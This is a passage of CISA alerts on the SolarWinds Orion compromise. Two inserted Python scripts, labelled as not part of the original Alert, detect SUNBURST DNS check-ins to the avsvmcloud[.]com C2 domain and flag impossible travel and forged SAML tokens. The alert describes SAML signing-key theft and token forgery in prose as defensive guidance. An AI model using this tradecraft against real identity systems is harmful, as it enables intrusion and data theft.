The existing tools and techniques used to evaluate cloud-based telemetry sources present challenges not represented in traditional forensic techniques. Primarily, the amount of telemetry retention is far less than the traditional logging facilities of on-premises data sources. Threat actor activity that is more than 90 days old is unlikely to have been saved by traditional sources or be visible with the Microsoft M365 Management API or in the UAL.

Service principal logging is available using the Azure Portal via the "Service Principal Sign-ins" feature. Enable settings in the Azure Portal (see “Diagnostic Setting”) to ingest logs into Sentinel or a third-party security information and event management (SIEM) tool. An Azure AD Premium P1 or P2 license is necessary to access this setting as well as other features, such as a log analytics workspace, storage account, or event hub.[12] These logs must be downloaded manually if not ingested by one of the methods listed in the Detection Methods section.

Global Administrator rights are often required by tools other than Hawk and Sparrow to evaluate M365 cloud security posture. Logging capability and visibility of data varies by licensing models and subscription to premium services, such as Microsoft Defender for O365 and Azure Sentinel. According to CrowdStrike, "There was an inability to audit via API, and there is the requirement for global admin rights to view important information which we found to be excessive. Key information should be easily accessible."[13]

Documentation for specific event codes, such as UserAuthenticationMethod 16457, which may indicate a suspicious SAML token forgery, is no longer available for the M365 Unified Audit Log. Auditing narratives on some events no longer exist as part of core Microsoft documentation sources.

The use of industry-standard SIEMs for log detection is crucial for providing historical context for threat hunting in Microsoft cloud environments. Standard G3/E3 licenses only provide 90 days of auditing; with the advanced auditing license that is provided with a G5/E5 license, audit logs can be extended to retain information for a year. CISA notes that this license change is proactive, rather than reactive: it allows enhanced visibility and features for telemetry from the moment of integration but does not provide retroactive visibility on previous events or historical context.

A properly configured SIEM can provide:

  1. Longer term storage of log data.
  2. Cross correlation of log data with endpoint data and network data (such as those produced by ADFS servers), endpoint detection and response data, and identity provider information.
  3. Ability to query use of application connectors in Azure.

Built-in tools, such as Microsoft Cloud Services and M365 applications, provide much of the same visibility available from custom tools and are mapped to the MITRE ATT&CK framework and easy-to-understand dashboards.[14] However, these tools often do not have the ability to pull historical data older than seven days. Therefore, storage solutions that appropriately meet governance standards and usability metrics for analysts for the SIEM must be carefully planned and arranged.

Contact Information

CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at

  • 1-888-282-0870 (From outside the United States: +1-703-235-8832)
  • central@cisa.dhs.gov (UNCLASS)
  • us-cert@dhs.sgov.gov (SIPRNET)
  • us-cert@dhs.ic.gov (JWICS)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/.

Resources

Azure Active Directory Workbook to Assess Solorigate Risk: https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718

Volexity - Dark Halo Leverages SolarWinds Compromise to Breach Organizations: https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

How to Find Activity with Sentinel: https://www.verboon.info/2020/10/monitoring-service-principal-sign-ins-with-azuread-and-azure-sentinel/

Third-Party Walkthrough of the Attack: https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/

National Security Agency Advisory on Detecting Abuse of Authentication Mechanisms: https://media.defense.gov/2020/Dec/17/2002554125/-1/-1/0/AUTHENTICATION_MECHANISMS_CSA_U_OO_198854_20.PDF

Microsoft 365 App for Splunk: https://splunkbase.splunk.com/app/3786/

CISA Remediation Guidance: https://us-cert.cisa.gov/ncas/alerts/aa20-352a

Feedback

CISA strives to make this report a valuable tool for our partners and welcomes feedback on how this publication could be improved. You can help by answering a few short questions about this report at the following URL: https://www.us-cert.cisa.gov/forms/feedback.

Revisions
  • Initial version: January 8, 2021


December 17, 2020

AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations

Original release date: December 17, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) version 8 framework. See the <a href="https://attack.mitre.org/versions/v8/">ATT&amp;CK for Enterprise version 8</a> for all referenced threat actor tactics and techniques.</em></p> <p>The Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises of U.S. government agencies, critical infrastructure entities, and private sector organizations by an advanced persistent threat (APT) actor beginning in at least March 2020. This APT actor has demonstrated patience, operational security, and complex tradecraft in these intrusions. CISA expects that removing this threat actor from compromised environments will be highly complex and challenging for organizations.</p> <p>One of the initial access vectors for this activity is a supply chain compromise of the following SolarWinds Orion products (see Appendix A).</p> <ul> <li>Orion Platform 2019.4 HF5, version 2019.4.5200.9083</li> <li>Orion Platform 2020.2 RC1, version 2020.2.100.12219</li> <li>Orion Platform 2020.2 RC2, version 2020.2.5200.12394</li> <li>Orion Platform 2020.2, 2020.2 HF1, version 2020.2.5300.12432</li> </ul> <p><strong>Note:</strong> CISA has evidence of additional initial access vectors, other than the SolarWinds Orion platform; however, these are still being investigated. CISA will update this Alert as new information becomes available.</p> <p>On December 13, 2020, CISA released <a href="https://cyber.dhs.gov/ed/21-01/">Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise</a>, ordering federal civilian executive branch departments and agencies to disconnect affected devices. 
<strong>Note:</strong> this Activity Alert does not supersede the requirements of Emergency Directive 21-01 (ED-21-01) and does not represent formal guidance to federal agencies under ED 21-01.</p> <p>CISA has determined that this threat poses a grave risk to the Federal Government and state, local, tribal, and territorial governments as well as critical infrastructure entities and other private sector organizations. CISA advises stakeholders to read this Alert and review the enclosed indicators (see Appendix B).</p> <h4>Key Takeaways</h4> <ul> <li>This is a patient, well-resourced, and focused adversary that has sustained long duration activity on victim networks.</li> <li>The SolarWinds Orion supply chain compromise is <strong><u>not</u></strong> the only initial infection vector this APT actor leveraged.</li> <li>Not all organizations that have the backdoor delivered through SolarWinds Orion have been targeted by the adversary with follow-on actions.</li> <li>Organizations with suspected compromises need to be highly conscious of operational security, including when engaging in incident response activities and planning and implementing remediation plans.<em>&nbsp;</em></li> </ul> <p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-352A-APT_Compromise_of_Government_Agencies%2C_Critical%20Infrastructure%2C_and_Private_Sector_Organizations.pdf">Click here</a> for a PDF version of this report.</p> <h3>Technical Details</h3><h4>Overview</h4> <p>CISA is aware of compromises, which began at least as early as March 2020, at U.S. government agencies, critical infrastructure entities, and private sector organizations by an APT actor. This threat actor has demonstrated sophistication and complex tradecraft in these intrusions. CISA expects that removing the threat actor from compromised environments will be highly complex and challenging. 
This adversary has demonstrated an ability to exploit software supply chains and shown significant knowledge of Windows networks. It is likely that the adversary has additional initial access vectors and tactics, techniques, and procedures (TTPs) that have not yet been discovered. CISA will continue to update this Alert and the corresponding indicators of compromise (IOCs) as new information becomes available.</p> <h4>Initial Infection Vectors [<a href="https://attack.mitre.org/versions/v8/tactics/TA0001/">TA0001</a>]</h4> <p>CISA is investigating incidents that exhibit adversary TTPs consistent with this activity, including some where victims either do not use SolarWinds Orion or where SolarWinds Orion was present but no SolarWinds exploitation activity was observed. Volexity has also reported publicly that it observed an intrusion into a think tank in which the initial access vector was a bypass of Duo multi-factor authentication on Outlook Web App (OWA) that relied on a stolen Duo integration secret key.[<a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">1</a>] Volexity attributes this intrusion to the same activity as the SolarWinds Orion supply chain compromise, and the TTPs are consistent between the two. This observation indicates that there are other initial access vectors beyond SolarWinds Orion, and there may still be others that are not yet known.</p> <h4>SolarWinds Orion Supply Chain Compromise</h4> <p>SolarWinds Orion is an enterprise network management software suite that includes performance and application monitoring and network configuration management along with several different types of analysis tools. SolarWinds Orion is used to monitor and manage on-premises and hosted infrastructures. 
To provide SolarWinds Orion with the necessary visibility into this diverse set of technologies, it is common for network administrators to configure SolarWinds Orion with pervasive privileges, making it a valuable target for adversary activity.</p> <p>The threat actor has been observed leveraging a software supply chain compromise of SolarWinds Orion products[<a href="https://www.solarwinds.com/securityadvisory">2</a>] (see Appendix A). The adversary added a malicious version of the binary <code>solarwinds.orion.core.businesslayer.dll</code> to the SolarWinds software lifecycle, and the tampered binary was then signed with the legitimate SolarWinds code signing certificate. Once installed, this binary calls out to a victim-specific subdomain of <code>avsvmcloud[.]com</code> using a protocol designed to mimic legitimate SolarWinds traffic. After the initial check-in, the adversary can use the Domain Name System (DNS) response to selectively send back new domains or IP addresses for interactive command and control (C2) traffic. Consequently, entities that observe traffic from their SolarWinds Orion devices to <code>avsvmcloud[.]com</code> should not immediately conclude that the adversary leveraged the SolarWinds Orion backdoor. Instead, additional investigation is needed into whether the SolarWinds Orion device engaged in further unexplained communications. If Canonical Name record (CNAME) resolutions associated with the <code>avsvmcloud[.]com</code> domain are observed, the adversary has likely taken additional action through the backdoor.</p> <p>Based on coordinated actions by multiple private sector partners, as of December 15, 2020, <code>avsvmcloud[.]com</code> resolves to <code>20.140.0[.]1</code>, which is an IP address on the Microsoft blocklist. This negates any future use of the implants and would have caused communications with this domain to cease. 
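</p> <p>The CNAME check described above, as an added example that is not part of the original Alert. The script reads resolver log lines and, for each internal client that queried the <code>avsvmcloud[.]com</code> domain, reports whether the answers were only ever the blocklisted <code>20.140.0[.]1</code> address named above, stayed at A-record beacons to other addresses, or included a CNAME that handed the backdoor a follow-on C2 location. The sample log, its whitespace-separated <code>timestamp client qname rtype rdata</code> layout, and every hostname and address in it are constructed for the example.</p>

```python
"""Triage of SUNBURST DNS check-ins from resolver logs.

Added example, not CISA's or SolarWinds' code. The log lines, hostnames and
addresses below are constructed; the one-answer-per-line log layout is an
assumption about your resolver's export format."""
from collections import defaultdict
from datetime import datetime

BEACON_DOMAIN = "avsvmcloud.com"
# The alert states avsvmcloud[.]com resolved to 20.140.0[.]1 (Microsoft blocklist)
# as of 2020-12-15. Extend this set with other sinkhole addresses you trust.
NEUTRALIZED = {"20.140.0.1"}


def parse_line(line):
    """Split '<iso-ts> <client-ip> <qname> <rtype> <rdata>' into a record."""
    ts, client, qname, rtype, rdata = line.split()
    return {
        "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
        "client": client,
        "qname": qname.rstrip(".").lower(),
        "rtype": rtype.upper(),
        "rdata": rdata.rstrip(".").lower(),
    }


def is_beacon_query(qname):
    """True for the apex or any victim-specific subdomain of the beacon domain."""
    return qname == BEACON_DOMAIN or qname.endswith("." + BEACON_DOMAIN)


def triage(lines):
    """Classify every client that queried the beacon domain.

    secondary-c2 : a CNAME answer came back for a beacon query, i.e. the backdoor
                   was handed a follow-on C2 location; treat the host as compromised.
    neutralized  : only A answers, all pointing at a blocklist/sinkhole address.
    beacon-only  : A answers to other addresses but no CNAME in this log window;
                   look for other unexplained communications from the host.
    Returns {client: {verdict, first, last, cnames}}."""
    seen = defaultdict(lambda: {"first": None, "last": None, "cnames": set(), "a": set()})
    for raw in lines:
        raw = raw.strip()
        if not raw or raw.startswith("#"):
            continue
        rec = parse_line(raw)
        if not is_beacon_query(rec["qname"]):
            continue
        h = seen[rec["client"]]
        h["first"] = rec["ts"] if h["first"] is None else min(h["first"], rec["ts"])
        h["last"] = rec["ts"] if h["last"] is None else max(h["last"], rec["ts"])
        if rec["rtype"] == "CNAME":
            h["cnames"].add(rec["rdata"])
        elif rec["rtype"] == "A":
            h["a"].add(rec["rdata"])
    verdicts = {}
    for client, h in seen.items():
        if h["cnames"]:
            verdict = "secondary-c2"
        elif h["a"] and h["a"] <= NEUTRALIZED:
            verdict = "neutralized"
        else:
            verdict = "beacon-only"
        verdicts[client] = {"verdict": verdict, "first": h["first"], "last": h["last"],
                            "cnames": sorted(h["cnames"])}
    return verdicts


# Constructed sample log: documentation address ranges and example.test names only.
SAMPLE_LOG = """
# ts client qname rtype rdata
2020-12-10T03:12:44Z 10.1.2.3 x1y2z3encodedguid.appsync-api.us-east-1.avsvmcloud.com A 198.51.100.20
2020-12-11T03:14:02Z 10.1.2.3 x1y2z3encodedguid.appsync-api.us-east-1.avsvmcloud.com A 198.51.100.20
2020-12-16T03:13:01Z 10.1.2.3 x1y2z3encodedguid.appsync-api.us-east-1.avsvmcloud.com A 20.140.0.1
2020-12-10T04:01:10Z 10.1.2.9 a9b8c7encodedguid.appsync-api.eu-west-1.avsvmcloud.com CNAME c2.example.test.
2020-12-10T04:01:10Z 10.1.2.9 c2.example.test A 203.0.113.77
2020-12-16T03:20:30Z 10.1.2.20 q7w8e9encodedguid.appsync-api.us-west-2.avsvmcloud.com A 20.140.0.1
2020-12-16T09:00:00Z 10.1.2.3 www.example.test A 203.0.113.5
"""

if __name__ == "__main__":
    for client, info in sorted(triage(SAMPLE_LOG.splitlines()).items()):
        print(client, info["verdict"], info["first"].date(), info["last"].date(), info["cnames"])
```

<p>The first and last beacon timestamps returned per client also let you check whether a host's beacons stopped before December 14, 2020 without any action by your defenders, which is the other signal the mitigations section treats as evidence that secondary C2 was established.</p> <p>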
In the case of infections where the attacker has already moved C2 past the initial beacon, infection will likely continue notwithstanding this action.</p> <p>SolarWinds Orion typically leverages a significant number of highly privileged accounts and access to perform normal business functions. Successful compromise of one of these systems can therefore enable further action and privileges in any environment where these accounts are trusted.</p> <h4>Anti-Forensic Techniques</h4> <p>The adversary is making extensive use of obfuscation to hide their C2 communications. The adversary is using virtual private servers (VPSs), often with IP addresses in the home country of the victim, for most communications to hide their activity among legitimate user traffic. The attackers also frequently rotate their “last mile” IP addresses to different endpoints to obscure their activity and avoid detection.</p> <p>FireEye has reported that the adversary is using steganography (<em>Obfuscated Files or Information: Steganography </em>[<a href="https://attack.mitre.org/versions/v8/techniques/T1027/003/">T1027.003</a>]) to obscure C2 communications.[<a href="https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html">3</a>] This technique negates many common defensive capabilities in detecting the activity. <strong>Note:</strong> CISA has not yet been able to independently confirm the adversary’s use of this technique.</p> <p>According to FireEye, the malware also checks for a list of hard-coded IPv4 and IPv6 addresses—including RFC-reserved IPv4 and IPv6 address ranges—in an attempt to detect whether it is executing in an analysis environment (e.g., a malware analysis sandbox); if so, the malware stops further execution. 
Additionally, FireEye analysis identified that the backdoor implemented time threshold checks to ensure that there are unpredictable delays between C2 communication attempts, further frustrating traditional network-based analysis.</p> <p>While not a full anti-forensic technique, the adversary is heavily leveraging compromised or spoofed tokens for accounts for lateral movement. This will frustrate commonly used detection techniques in many environments. Since valid, but unauthorized, security tokens and accounts are utilized, detecting this activity will require the maturity to identify actions that are outside of a user’s normal duties. For example, it is unlikely that an account associated with the HR department would need to access the cyber threat intelligence database.</p> <p>Taken together, these observed techniques indicate an adversary who is skilled, stealthy with operational security, and is willing to expend significant resources to maintain covert presence.</p> <h4>Privilege Escalation and Persistence [<a href="https://attack.mitre.org/versions/v8/tactics/TA0004">TA0004</a>, <a href="https://attack.mitre.org/versions/v8/tactics/TA0003/">TA0003</a>]</h4> <p>The adversary has been observed using multiple persistence mechanisms across a variety of intrusions. CISA has observed the threat actor adding authentication tokens and credentials to highly privileged Active Directory domain accounts as a persistence and escalation mechanism. In many instances, the tokens enable access to both on-premise and hosted resources. Microsoft has released a query that can help detect this activity.[<a href="https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SigninLogs/AzureAADPowerShellAnomaly.yaml">4</a>]</p> <p>Microsoft reported that the actor has added new federation trusts to existing infrastructure, a technique that CISA believes was utilized by a threat actor in an incident to which CISA has responded. 
Where this technique is used, it is possible that authentication can occur outside of an organization’s known infrastructure and may not be visible to the legitimate system owner. Microsoft has released a query to help identify this activity.[<a href="https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml">5</a>]</p> <h4>User Impersonation</h4> <p>The adversary’s initial objectives, as understood today, appear to be to collect information from victim environments. One of the principal ways the adversary is accomplishing this objective is by compromising the Security Assertion Markup Language (SAML) token-signing certificate and its private key using their escalated Active Directory privileges. Once this is accomplished, the adversary creates unauthorized but validly signed tokens and presents them to services that trust SAML tokens from the environment. These tokens can then be used to access resources in hosted environments, such as email, for data exfiltration via authorized application programming interfaces (APIs).</p> <p>CISA has observed in its incident response work adversaries targeting email accounts belonging to key personnel, including IT and incident response personnel.</p> <p>These are some key functions and systems that commonly use SAML.</p> <ul> <li>Hosted email services</li> <li>Hosted business intelligence applications</li> <li>Travel systems</li> <li>Timecard systems</li> <li>File storage services (such as SharePoint)</li> </ul> <h4>Detection: Impossible Logins</h4> <p>The adversary is using a complex network of IP addresses to obscure their activity, which can result in a detection opportunity referred to as “impossible travel.” Impossible travel occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses during the time period between the logins). 
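</p> <p>The impossible-travel check described above and the three token conditions listed under Detection: Impossible Tokens, as one added example that is not part of the original Alert. The sign-in records, the SAML assertion, and the identity-provider login list are constructed; the 900 km/h speed ceiling, the one-hour expected token lifetime, and the practice of skipping sign-ins from a known corporate VPN egress address (to avoid the VPN false positives the Note below describes) are assumptions.</p>

```python
"""Sign-in anomaly checks described in AA20-352A: impossible travel and
impossible SAML tokens. Added example, not CISA's code; all sample data below
is constructed and every threshold is an assumption."""
import math
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

SAML_NS = {"saml": "urn:oasis:names:tc:SAML:2.0:assertion"}


def _parse_ts(s):
    """Parse an ISO-8601 timestamp with a trailing Z into an aware datetime."""
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    a = (math.sin((p2 - p1) / 2) ** 2
         + math.cos(p1) * math.cos(p2) * math.sin(math.radians(lon2 - lon1) / 2) ** 2)
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def impossible_travel(signins, max_kmh=900.0, vpn_egress=frozenset()):
    """Flag consecutive sign-ins by the same user that would require moving
    faster than max_kmh (assumed: roughly airliner speed). Sign-ins from known
    corporate VPN egress addresses are ignored, because a user who connects to
    the VPN before a cloud sign-in appears to jump to the VPN's location.
    signins: dicts with user, ts (aware datetime), ip, lat, lon."""
    hits, last = [], {}
    for s in sorted(signins, key=lambda s: s["ts"]):
        if s["ip"] in vpn_egress:
            continue
        prev = last.get(s["user"])
        if prev is not None:
            km = haversine_km(prev["lat"], prev["lon"], s["lat"], s["lon"])
            hours = (s["ts"] - prev["ts"]).total_seconds() / 3600.0
            # hours == 0 with km > 0 is impossible too, so guard the division.
            if km > 0 and (hours == 0 or km / hours > max_kmh):
                hits.append((s["user"], prev["ip"], s["ip"], round(km), round(hours, 2)))
        last[s["user"]] = s
    return hits


def check_saml_token(assertion_xml, used_at, idp_logins,
                     expected_lifetime=timedelta(hours=1)):
    """Apply the three 'impossible token' conditions to one SAML 2.0 assertion.
    used_at: aware datetime when the token was presented to the service.
    idp_logins: (subject, aware datetime) pairs of interactive logins seen at
    the identity provider. Returns a list of findings; empty means normal."""
    root = ET.fromstring(assertion_xml)
    issued = _parse_ts(root.attrib["IssueInstant"])
    expires = _parse_ts(root.find("saml:Conditions", SAML_NS).attrib["NotOnOrAfter"])
    subject = root.findtext("saml:Subject/saml:NameID", namespaces=SAML_NS)
    findings = []
    if expires - issued > expected_lifetime:
        findings.append(f"validity {expires - issued} exceeds expected {expected_lifetime}")
    if used_at == issued:
        findings.append("used at the exact instant of issuance")
    if not any(u == subject and abs(ts - issued) <= timedelta(hours=1)
               for u, ts in idp_logins):
        findings.append(f"no identity-provider login for {subject} within an hour")
    return findings


# Constructed sample data (documentation IP ranges, example.test hostnames).
T0 = datetime(2020, 12, 14, 9, 0, tzinfo=timezone.utc)
SIGNINS = [
    {"user": "alice", "ts": T0, "ip": "203.0.113.10", "lat": 38.9, "lon": -77.0},
    {"user": "alice", "ts": T0 + timedelta(minutes=20), "ip": "198.51.100.7",
     "lat": 37.8, "lon": -122.4},
    {"user": "bob", "ts": T0, "ip": "192.0.2.5", "lat": 38.9, "lon": -77.0},
    {"user": "bob", "ts": T0 + timedelta(minutes=5), "ip": "192.0.2.200",
     "lat": 51.5, "lon": -0.1},
]
VPN_EGRESS = frozenset({"192.0.2.200"})  # assumed corporate VPN exit address

FORGED_ASSERTION = """<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
    ID="_forged" Version="2.0" IssueInstant="2020-12-14T09:00:00Z">
  <saml:Issuer>http://adfs.example.test/adfs/services/trust</saml:Issuer>
  <saml:Subject><saml:NameID>alice@example.test</saml:NameID></saml:Subject>
  <saml:Conditions NotBefore="2020-12-14T09:00:00Z" NotOnOrAfter="2020-12-15T09:00:00Z"/>
</saml:Assertion>"""
IDP_LOGINS = [("alice@example.test", T0 - timedelta(hours=3))]
# A normal token for contrast: one-hour lifetime, used 15 s after issuance,
# preceded by an interactive login at the identity provider.
LEGIT_ASSERTION = FORGED_ASSERTION.replace('ID="_forged"', 'ID="_legit"').replace(
    'NotOnOrAfter="2020-12-15T09:00:00Z"', 'NotOnOrAfter="2020-12-14T10:00:00Z"')
LEGIT_USED_AT = T0 + timedelta(seconds=15)
LEGIT_LOGINS = [("alice@example.test", T0 - timedelta(seconds=5))]

if __name__ == "__main__":
    for hit in impossible_travel(SIGNINS, vpn_egress=VPN_EGRESS):
        print("impossible travel:", hit)
    for f in check_saml_token(FORGED_ASSERTION, used_at=T0, idp_logins=IDP_LOGINS):
        print("impossible token:", f)
```

<p>A token minted with a stolen signing certificate tends to trip all three token conditions at once: it can carry whatever validity window the adversary chooses, it is presented as soon as it is created, and no interactive login for the subject ever reached the identity provider. For the travel check, remember that "last mile" addresses in the victim's home country (see Anti-Forensic Techniques) can keep two sign-ins geographically close, so treat distance-based rules as one signal among several.</p> <p>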
<strong>Note:</strong> implementing this detection opportunity can result in false positives if legitimate users apply virtual private network (VPN) solutions before connecting into networks.</p> <h4>Detection: Impossible Tokens</h4> <p>The following conditions may indicate adversary activity.</p> <ul> <li>Most organizations have SAML tokens with 1-hour validity periods. Long SAML token validity durations, such as 24 hours, could be unusual.</li> <li>The SAML token contains different timestamps, including the time it was issued and the last time it was used. A token having the same timestamp for when it was issued and when it was used is not indicative of normal user behavior as users tend to use the token within a few seconds but not at the exact same time of issuance.</li> <li>A token that does not have an associated login with its user account within an hour of the token being generated also warrants investigation.</li> </ul> <h4>Operational Security</h4> <p>Due to the nature of this pattern of adversary activity—and the targeting of key personnel, incident response staff, and IT email accounts—discussion of findings and mitigations should be considered very sensitive, and should be protected by operational security measures. 
An operational security plan needs to be developed and socialized, via out-of-band communications, to ensure all staff are aware of the applicable handling caveats.</p> <p>Operational security plans should include:</p> <ul> <li>Out-of-band communications guidance for staff and leadership;</li> <li>An outline of what “normal business” is acceptable to be conducted on the suspect network;</li> <li>A call tree for critical contacts and decision making; and</li> <li>Considerations for external communications to stakeholders and media.</li> </ul> <h4>MITRE ATT&amp;CK® Techniques</h4> <p>CISA assesses that the threat actor engaged in the activities described in this Alert uses the below-listed ATT&amp;CK techniques.</p> <ul> <li><em>Query Registry</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1012/">T1012</a>]</li> <li><em>Obfuscated Files or Information</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1027/">T1027</a>]</li> <li><em>Obfuscated Files or Information: Steganography</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1027/003">T1027.003</a>]</li> <li><em>Process Discovery</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1057/">T1057</a>]</li> <li><em>Indicator Removal on Host: File Deletion</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1070/004">T1070.004</a>]</li> <li><em>Application Layer Protocol: Web Protocols</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1071/001">T1071.001</a>]</li> <li><em>Application Layer Protocol: DNS</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1071/004">T1071.004</a>]</li> <li><em>File and Directory Discovery</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1083/">T1083</a>]</li> <li><em>Ingress Tool Transfer</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1105/">T1105</a>]</li> <li><em>Data Encoding: Standard Encoding</em> [<a 
href="https://attack.mitre.org/versions/v8/techniques/T1132/001">T1132.001</a>]</li> <li><em>Supply Chain Compromise: Compromise Software Dependencies and Development Tools</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1195/001">T1195.001</a>]</li> <li><em>Supply Chain Compromise: Compromise Software Supply Chain</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1195/002">T1195.002</a>]</li> <li><em>Software Discovery </em>[<a href="https://attack.mitre.org/versions/v8/techniques/T1518/">T1518</a>]</li> <li><em>Software Discovery: Security Software </em>[<a href="https://attack.mitre.org/versions/v8/techniques/T1518/001">T1518.001</a>]</li> <li><em>Create or Modify System Process: Windows Service</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1543/003">T1543.003</a>]</li> <li><em>Subvert Trust Controls: Code Signing</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1553/002">T1553.002</a>]</li> <li><em>Dynamic Resolution: Domain Generation Algorithms</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1568/002">T1568.002</a>]</li> <li><em>System Services: Service Execution</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1569/002">T1569.002</a>]</li> <li><em>Compromise Infrastructure</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1584/">T1584</a>]</li> </ul> <h3>Mitigations</h3><h4>SolarWinds Orion Owners</h4> <p>Owners of vulnerable SolarWinds Orion products will generally fall into one of three categories.</p> <ul> <li>Category 1 includes those who do not have the identified malicious binary. These owners can patch their systems and resume use as determined by and consistent with their internal risk evaluations.</li> <li>Category 2 includes those who have identified the presence of the malicious binary—with or without beaconing to <code>avsvmcloud[.]com</code>. 
Owners with the malicious binary whose vulnerable appliances’ only unexplained external communications are with <code>avsvmcloud[.]com</code>—a fact that can be verified by comprehensive network monitoring for the device—can harden the device, re-install the updated software from a verified software supply chain, and resume use as determined by and consistent with a thorough risk evaluation.</li> <li>Category 3 includes those with the binary beaconing to <code>avsvmcloud[.]com</code> and secondary C2 activity to a separate domain or IP address. If you observed communications with <code>avsvmcloud[.]com</code> that appeared to suddenly cease prior to December 14, 2020—not due to an action taken by your network defenders—you fall into this category. Assume the environment has been compromised, and initiate incident response procedures immediately.</li> </ul> <h4>Compromise Mitigations</h4> <p>If the adversary has compromised administrative-level credentials in an environment, or if organizations identify SAML abuse in the environment, mitigating individual issues, systems, servers, or specific user accounts will likely not lead to the adversary’s removal from the network. In such cases, organizations should consider the entire identity trust store compromised. In the event of a total identity compromise, a full reconstitution of identity and trust services is required to remediate successfully. In this reconstitution, it bears repeating that this threat actor is among the most capable, and in many cases a full rebuild of the environment is the safest action.</p> <h4>SolarWinds Orion Specific Mitigations</h4> <p>The following mitigations apply to networks using the SolarWinds Orion product. 
This includes any information system that is used by an entity or operated on its behalf.</p> <p>Organizations that have the <a href="https://cyber.dhs.gov/ed/21-01/#what-does-the-directive-mean-by-expertise">expertise</a> to take the actions in Step 1 immediately should do so before proceeding to Step 2. Organizations without this capability should proceed directly to Step 2. Federal civilian executive branch agencies should ignore the below and refer instead to <a href="https://cyber.dhs.gov/ed/21-01/">Emergency Directive 21-01</a> (and forthcoming associated guidance) for mitigation steps.</p> <ul> <li><strong>Step 1</strong> <ul> <li><strong>Forensically image system memory and/or host operating systems hosting all instances of affected versions of SolarWinds Orion.</strong> Analyze for new user or service accounts, privileged or otherwise.</li> <li>Analyze stored network traffic for <a href="https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software">indications of compromise</a>, including new external DNS domains to which a small number of agency hosts (e.g., SolarWinds systems) have had connections.</li> </ul> </li> <li><strong>Step 2</strong> <ul> <li>Affected organizations should immediately <strong>disconnect from their network, or power down, all instances of affected versions of SolarWinds Orion</strong>.</li> <li>Additionally: <ul> <li><strong>Block all traffic</strong> to and from hosts, external to the enterprise, where any version of SolarWinds Orion software has been installed.</li> <li><strong>Identify and remove </strong>all threat actor-controlled accounts and identified persistence mechanisms. 
</li> </ul> </li> </ul> </li> <li><strong>Step 3</strong> <ul> <li><strong>Only after all known threat actor-controlled accounts and persistence mechanisms have been removed:</strong> <ul> <li>Treat all hosts monitored by the SolarWinds Orion monitoring software as compromised by threat actors and assume that the threat actor has deployed further persistence mechanisms.</li> <li>Rebuild hosts monitored by the SolarWinds Orion monitoring software using trusted sources.</li> <li>Reset all credentials used by or stored in SolarWinds software. Such credentials should be considered compromised.</li> <li>Take actions to remediate kerberoasting, including—as necessary or appropriate—engaging a third party with experience eradicating APTs from enterprise networks. For Windows environments, refer to Microsoft’s documentation on kerberoasting: <a href="https://techcommunity.microsoft.com/t5/microsoft-security-and/detecting-ldap-based-kerberoasting-with-azure-atp/ba-p/462448">https://techcommunity.microsoft.com/t5/microsoft-security-and/detecting-ldap-based-kerberoasting-with-azure-atp/ba-p/462448</a>.</li> <li>Require use of multi-factor authentication. 
